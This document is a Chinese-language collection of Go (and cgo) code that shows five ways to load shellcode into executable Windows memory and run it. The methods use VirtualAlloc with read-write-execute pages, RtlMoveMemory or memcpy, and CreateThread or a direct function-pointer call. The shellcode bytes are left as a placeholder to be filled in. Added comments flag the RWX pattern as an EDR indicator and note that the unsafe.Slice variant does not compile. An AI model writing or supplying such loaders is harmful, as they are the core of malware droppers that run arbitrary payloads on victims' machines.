以下是加载shellcode的几种不同方式的示例:
- 使用syscall.Syscall6加载shellcode:
package main
import (
"syscall"
"unsafe"
)
// main is a Windows-only entry point: it reserves and commits a region with
// VirtualAlloc, copies the byte slice into it with RtlMoveMemory, and starts a
// thread at that address with CreateThread. Every call goes through
// syscall.Syscall6 with the procedure address looked up from kernel32.dll.
func main() {
	shellcode := []byte(<shellcode>)
	// 0x3000 is MEM_COMMIT|MEM_RESERVE and 0x40 is PAGE_EXECUTE_READWRITE, so
	// the region is writable and executable at the same time; RWX private
	// memory followed by a thread start inside it is a well-known indicator
	// for memory scanners and EDR telemetry.
	// The error and second return value of Syscall6 are discarded (the `_`
	// results), so a failed allocation is not detected here.
	allocatedMemory, _, _ := syscall.Syscall6(syscall.NewLazyDLL("kernel32.dll").NewProc("VirtualAlloc").Addr(), 4, 0, uintptr(len(shellcode)), 0x3000, 0x40, 0, 0)
	// Copy len(shellcode) bytes from the Go slice into the new region.
	syscall.Syscall6(syscall.NewLazyDLL("kernel32.dll").NewProc("RtlMoveMemory").Addr(), 3, allocatedMemory, uintptr(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)), 0, 0, 0)
	// Thread start address is the allocated region; the thread handle is not
	// kept and main returns without waiting for it.
	syscall.Syscall6(syscall.NewLazyDLL("kernel32.dll").NewProc("CreateThread").Addr(), 6, 0, 0, allocatedMemory, 0, 0, 0)
}
- 使用reflect.Value.Call加载shellcode:
package main
import (
"reflect"
"syscall"
"unsafe"
)
// main performs the same VirtualAlloc / RtlMoveMemory / CreateThread sequence
// as the Syscall6 variant, but calls the procedures through LazyProc.Call.
// reflect.Value is only used to wrap and unwrap the returned address; it adds
// no behaviour of its own. Windows-only.
func main() {
	shellcode := []byte(<shellcode>)
	// Each NewLazyDLL call resolves kernel32.dll separately; the three procs
	// could share one handle.
	virtualAlloc := syscall.NewLazyDLL("kernel32.dll").NewProc("VirtualAlloc")
	rtlMoveMemory := syscall.NewLazyDLL("kernel32.dll").NewProc("RtlMoveMemory")
	createThread := syscall.NewLazyDLL("kernel32.dll").NewProc("CreateThread")
	// 0x3000 = MEM_COMMIT|MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE (RWX).
	// Call returns (r1, r2, err); only r1 (the base address) is used and the
	// error is never inspected.
	allocatedMemory := reflect.ValueOf(virtualAlloc.Call(0, uintptr(len(shellcode)), 0x3000, 0x40, 0, 0)[0])
	// Interface() yields the wrapped address back; copy len(shellcode) bytes.
	rtlMoveMemory.Call(allocatedMemory.Interface(), uintptr(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)))
	// Start a thread at the allocated region; the handle is discarded.
	createThread.Call(0, 0, allocatedMemory.Interface(), 0, 0, 0)
}
- 使用unsafe.Pointer加载shellcode:
package main
import (
"syscall"
"unsafe"
)
// main is identical in effect to the first Syscall6 example; the only
// difference is that the source pointer is held in a named unsafe.Pointer
// local before being converted to uintptr. Windows-only.
func main() {
	shellcode := []byte(<shellcode>)
	// 0x3000 = MEM_COMMIT|MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE: an RWX
	// region. The Syscall6 error return is discarded.
	allocatedMemory, _, _ := syscall.Syscall6(syscall.NewLazyDLL("kernel32.dll").NewProc("VirtualAlloc").Addr(), 4, 0, uintptr(len(shellcode)), 0x3000, 0x40, 0, 0)
	// Pointer to the first byte of the Go slice; converted to uintptr only at
	// the call site below.
	shellcodePointer := unsafe.Pointer(&shellcode[0])
	// Copy len(shellcode) bytes into the allocated region.
	syscall.Syscall6(syscall.NewLazyDLL("kernel32.dll").NewProc("RtlMoveMemory").Addr(), 3, allocatedMemory, uintptr(shellcodePointer), uintptr(len(shellcode)), 0, 0, 0)
	// Start a thread at the allocated region; the handle is not kept.
	syscall.Syscall6(syscall.NewLazyDLL("kernel32.dll").NewProc("CreateThread").Addr(), 6, 0, 0, allocatedMemory, 0, 0, 0)
}
- 使用unsafe.Slice加载shellcode:
package main
import (
"syscall"
"unsafe"
)
// main differs from the previous examples only in the copy step: instead of
// calling RtlMoveMemory it intends to view the allocated region as a Go byte
// slice via unsafe.Slice and copy into that. Allocation and thread creation
// are unchanged. Windows-only.
func main() {
	shellcode := []byte(<shellcode>)
	// 0x3000 = MEM_COMMIT|MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE: an RWX
	// region. The Syscall6 error return is discarded.
	allocatedMemory, _, _ := syscall.Syscall6(syscall.NewLazyDLL("kernel32.dll").NewProc("VirtualAlloc").Addr(), 4, 0, uintptr(len(shellcode)), 0x3000, 0x40, 0, 0)
	shellcodePointer := unsafe.Pointer(&shellcode[0])
	// NOTE(review): allocatedMemory is a uintptr, and a plain []byte has no
	// Copy method, so this line as written does not type-check; treat the
	// example as a sketch of the intended slice-based copy, not working code.
	unsafe.Slice((*byte)(allocatedMemory), len(shellcode)).Copy(shellcodePointer, len(shellcode))
	// Start a thread at the allocated region; the handle is not kept.
	syscall.Syscall6(syscall.NewLazyDLL("kernel32.dll").NewProc("CreateThread").Addr(), 6, 0, 0, allocatedMemory, 0, 0, 0)
}
- 使用C语言加载shellcode:
package main
// #include <stdlib.h>
// #include <Windows.h>
//
// void executeShellcode()
// {
// unsigned char shellcode[] = <shellcode>;
// void* allocatedMemory = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
// memcpy(allocatedMemory, shellcode, sizeof(shellcode));
// ((void(*)())allocatedMemory)();
// }
import "C"
// main delegates entirely to executeShellcode, the C function defined in the
// cgo preamble above import "C". That function allocates an RWX region with
// VirtualAlloc, memcpy's the static array into it and calls it as a function
// on the current thread (no CreateThread in this variant). Building this
// requires cgo and a C toolchain targeting Windows.
func main() {
	C.executeShellcode()
}
请注意,上述示例中的<shellcode>应替换为实际的shellcode字节码